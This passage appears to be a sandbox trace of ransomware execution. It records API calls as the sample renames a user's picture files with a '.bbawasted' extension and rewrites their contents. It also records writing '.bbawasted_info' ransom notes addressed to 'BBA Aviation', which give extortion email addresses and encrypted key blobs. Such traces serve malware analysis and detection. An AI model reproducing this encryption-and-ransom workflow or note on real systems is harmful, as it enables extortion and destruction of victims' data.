KEY:\r\n[begin_key]JMqLEpM/NmFYLavO9Swv0Sl4Gq15CcibNijIACvJQPpWBaxfk/ejXYykFAAGcHm5\r\nqD6NOAx3SGvh0i2Jui9rCjvVRkHqYBBgRZwxjw7zFKuMttqdxpCLs5UwmfU54JBf\r\nrV49TaoM7ExHQTriFUkuMiU9mdYFZCPoptw0v8frVM/C6nH68CXHc+JRYPgYOrqU\r\nQbL8bFEWSbVr5Ic5CbOGqUvzQL9pexjHeFnFX4qXZGzBxUCsKFrVYp+RuDhboH2o\r\nNfHJzs4OqEzPjnjy3tvIe0lV8Rqxz2PD9cAsaAvvCwujKfAgv3SucQfmHAHkE5d/\r\n87hVTxB4HavV6fXTFm9pU8ES8rTMWHjB0DNqFqnsRts2OhHmve5Xl9/uwmOT9UAc\r\nndpVm/1tTS8ZWcs8YHJriUfa1UqxqBvb3Cv11uYzP2XMTlJVrCuYi10yNVxzLNRo\r\nhTuz140bLrcS16lUFvwlDdr+fOIIIFBQKrfBByBzfHDZnvruuQ0RjWpByiUCK3md\r\n68E445snj3Z07Cwl5vLcP36eQdXRZoJcH0dM43wZjPXhZc0ybw/ndVrdCERalK/R\r\n7MDTZwbd1l3TzLd+zVG9HRa7eNQGsnmkFaS9A3BhG3yZL8EOLR0AylY7yOf7xH0K\r\naRzf6vJs4l6SwZWYcdHCrmXuhq2hqf7sHynlQNvR6LL=[end_key]\r\nKEEP IT\r\n") returned 984 [0225.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0225.168] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0225.169] SetEndOfFile (hFile=0x290) returned 1 [0225.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.171] CloseHandle (hObject=0x290) returned 1 [0225.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0225.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6af308 | out: hHeap=0x660000) returned 1 [0225.172] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6240) returned 1 [0225.172] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0225.172] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0225.172] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\srwmy.gif") returned 44 [0225.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x262) returned 0x6adb18 [0225.173] lstrcpyW (in: lpString1=0x6adb70, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0225.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.173] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a63d8) returned 1 [0225.173] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0225.173] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0225.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\srwmy.gif.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\srwmy.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0225.174] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0225.175] SetEndOfFile (hFile=0x290) returned 1 [0225.175] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0225.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.176] lstrcpyW (in: lpString1=0x6adb70, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0225.176] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\srwmy.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\srwmy.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\srwmy.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\srwmy.gif.bbawasted")) returned 1 [0225.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\srwmy.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\srwmy.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0225.177] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0225.177] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x17f4e [0225.177] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17f4e) returned 0x5f0000 [0225.177] CloseHandle (hObject=0x27c) returned 1 [0225.179] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0225.180] CloseHandle (hObject=0x294) returned 1 [0225.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0225.180] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6c58) returned 1 [0225.181] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0225.181] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0225.181] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6ce0) returned 1 [0225.181] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0225.181] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0225.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0225.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0225.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.380] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]rDvZVsrPGu8F/Gd6sG+g7CxsBPBtlBXBgW6KmtPby+TvL70hz8WJOD3+3OiBCkOV\r\nZyClTOAjhGCLnr3Hqv1tb5VTXIy7g7OxFvT3o/DawglGPrI3kxHS9fVl7EQeTN80\r\nJqp/8YgOhEAVBXqWCdTkhGWJEiLQRj8TCeH1cl1sHw81xTGUNcp3o9AowlO05hax\r\nT8nnttzISyr2aWZko609IkqjaDcxYoyHo+Gkvks8w1wg5hygHIRPY0+LdZ2HmIEF\r\n4VvTZzkaA00ZGJJEQMr7DfBj3kc2/PDhb623VHXW4WYnpk1LcrH5vAD2d+w6rjq/\r\nhplSs9Bu+Uq2cAulZfkPhcUP110/eHCK1CINS37AL/xf97kDBelRuT76ecVFkl3z\r\nF8KGnJYzt4jnREMln4TcTrNh81HreY+BUl5gmnpJNtMF925yM5v93HEgjDasTDeH\r\n3mpldwLv30GQS0cHzmk1hUWH08UfwnE+fhqYx6ZI6UtKs2Sw3nwj5x/mk//cd2OJ\r\nXzQQcj1FBwLedeKTl34Eh7ra3yt0+wSnirEsuLQ5yF4aDCejxHKW+yHcMrWvjfp2\r\nL6JYzi8m/q87WLo7f7f2lR7sdidWzMpCMAT5I6RblDj7AMm76fQ/uIR0vDxH7y3I\r\n6azeOgStASjkWOp0ZfJNGLxWag2M01MNv0Qcmv6kbCq=[end_key]\r\nKEEP IT\r\n") returned 984 [0225.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0225.380] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0225.380] SetEndOfFile (hFile=0x290) returned 1 [0225.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.383] CloseHandle (hObject=0x290) returned 1 [0225.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0225.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6af3c0 | out: hHeap=0x660000) returned 1 [0225.383] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6708) returned 1 [0225.384] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0225.384] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0225.384] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\yJIX-s5a_m1w7v.bmp") returned 53 [0225.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6c4b88 [0225.384] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0225.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.384] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6928) returned 1 [0225.385] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0225.385] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0225.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\yJIX-s5a_m1w7v.bmp.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\yjix-s5a_m1w7v.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0225.386] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0225.388] SetEndOfFile (hFile=0x290) returned 1 [0225.388] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0225.388] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.388] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0225.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\yJIX-s5a_m1w7v.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\yjix-s5a_m1w7v.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\yJIX-s5a_m1w7v.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\yjix-s5a_m1w7v.bmp.bbawasted")) returned 1 [0225.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\yJIX-s5a_m1w7v.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\yjix-s5a_m1w7v.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0225.390] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0225.390] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1d55 [0225.390] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d55) returned 0x5f0000 [0225.391] CloseHandle (hObject=0x27c) returned 1 [0225.391] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0225.392] CloseHandle (hObject=0x294) returned 1 [0225.392] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0225.392] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6790) returned 1 [0225.392] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0225.393] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0225.393] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a65f8) returned 1 [0225.393] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0225.393] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0225.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0225.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0225.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.405] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]km0mEX0TKBHQm1/DjNskq4hSLtUP5NbVGjTwedvqkGp4K7yESFedV3d1t2/JpEYH\r\nYlBamTs3m6zLcaOlLtx1PfG4ixM9oP1BH8YoGezzm4cCHaICPtyJIJNOjt/2JOQU\r\nSP+fpa3ENL5selXAIzdjpIguVbv6tmSpbNFOJyTDfOTbyoLknm4q4/4IsUsf1xD5\r\nB0q7oyZ01MP/D5t0dk3uMdPcBfZy0msCOg5N/16i8CDP42q1jTWkxQfQ/Zz3FVcH\r\nZzQQ1bYKs/dnlkCbBjpmHLVIfB0+/WTzOHWotRaKekoh9PW5rEYUO4KLaBwiurSl\r\nGLSB7Z8FX3uTsaSG0nXKf93Hb0f9xPgIcabojdYjhBjfrwktrgq7+vGqoRjpiKNo\r\ntAgEd+mWTa7NQZqullTEmM7FI2CXkdqYwChB78njoONSotxQ/lMlWDaUBv8ZEF7U\r\nLvKWq1aarfCy1UXqRwzi3d+aMQ1M2zv76HU0WuUIqVthi2DKVmoN4X/f7kMZ8ZAU\r\nslBi0SL0Qce2je3zaLeWnkx3zCxlHYd9XHx0h+9uQzQ+PhKQ+dzuekMqp71wmUki\r\nM79vQ838wnsCUx4mbLbbmPKzWkk9hauSyHA8Vd6HzFnmcYwEoEsi56VQhU0XmQu0\r\n4EH6TD2oT6c0f4IGamqldn0t7AdEMeH1uaJ+URtm2t1=[end_key]\r\nKEEP IT\r\n") returned 984 [0225.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0225.405] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0225.405] SetEndOfFile (hFile=0x290) returned 1 [0225.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.409] CloseHandle (hObject=0x290) returned 1 [0225.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0225.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7928 | out: hHeap=0x660000) returned 1 [0225.410] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a62c8) returned 1 [0225.410] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0225.410] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0225.410] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\b-CTb.jpg") returned 38 [0225.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x256) returned 0x6adb18 [0225.411] lstrcpyW (in: lpString1=0x6adb64, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0225.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.411] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6c58) returned 1 [0225.411] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0225.411] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0225.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\b-CTb.jpg.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\b-ctb.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0225.412] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0225.414] SetEndOfFile (hFile=0x290) returned 1 [0225.414] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0225.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.414] lstrcpyW (in: lpString1=0x6adb64, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0225.414] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\b-CTb.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\b-ctb.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\b-CTb.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\b-ctb.jpg.bbawasted")) returned 1 [0225.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\b-CTb.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\b-ctb.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0225.416] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0225.416] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xb529 [0225.416] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb529) returned 0x5f0000 [0225.416] CloseHandle (hObject=0x294) returned 1 [0225.418] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0225.419] CloseHandle (hObject=0x27c) returned 1 [0225.419] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0225.419] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6a38) returned 1 [0225.420] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0225.420] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0225.420] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a61b8) returned 1 [0225.421] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0225.421] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0226.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0226.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0226.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0226.341] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JS+ChboV5cquKhvL9HU6JGA5eZnHtzW36g8TeY9/F52S10S1d+AABnr/OozivoIK\r\nfoQEWpARj4huH7ukcWOBZf6Y7n9McluPhv6hCZJZkGVId8EzDpoPjNGnnfR3onyd\r\nIyYFei0VlwQMKTMsYdUFcecjf692TMNnZ/xykdX7+O7zc6yqvLKDTIIaGjlhvJ/R\r\nLwqVBzy9MuwNrznyzU+ALauNDxzp4WQUMmh7YfFqrsF5DHn/X4Ln2s4X1linFfDH\r\nCCSU4q8giUbfs9o5NgFeFR3QAN6Mtk2szp987RlNm6X4sOHPWRBSS5DKv7CDjeMB\r\n63QqqVCxJymgPbz9Lb4Cf+7LE6aENiBaXFFGe2mTfSr9Rl17c6hgtwX1ixr3Aoq0\r\nDf1LHqkhPTGjtGQGgZwmOmEhwxUVgNHIeGs0ZjMwI7eCLTU0seQ/0llH6/SnNS6f\r\nNiUnMB4MrY0xlFuLbLmAIVUQPzWGRLzHBDToVpiIYY4xXshpN+E7aEmOsWf7S4+8\r\nzSsnsXSVGzLSmAZRr9Z8uFW3Sh0wgyGN6vz6T5DhaiedGW1ibSluITWcP5kM85Bx\r\nxe00H600t9hfpbZxFiPveaN0vtfdAa5TX3OLNly0MdkUcsmJS7nLhlmTSrgO9R9T\r\nsM/gxRGhd1KJjOWyc/wV5Nf82IMCplNSDd09NXWYPJG=[end_key]\r\nKEEP IT\r\n") returned 984 [0226.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0226.341] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0226.342] SetEndOfFile (hFile=0x290) returned 1 [0226.344] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0226.344] CloseHandle (hObject=0x290) returned 1 [0226.345] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0226.345] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b3308 | out: hHeap=0x660000) returned 1 [0226.345] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6460) returned 1 [0226.346] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0226.346] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0226.346] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\DClE9hLj.gif") returned 41 [0226.346] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) 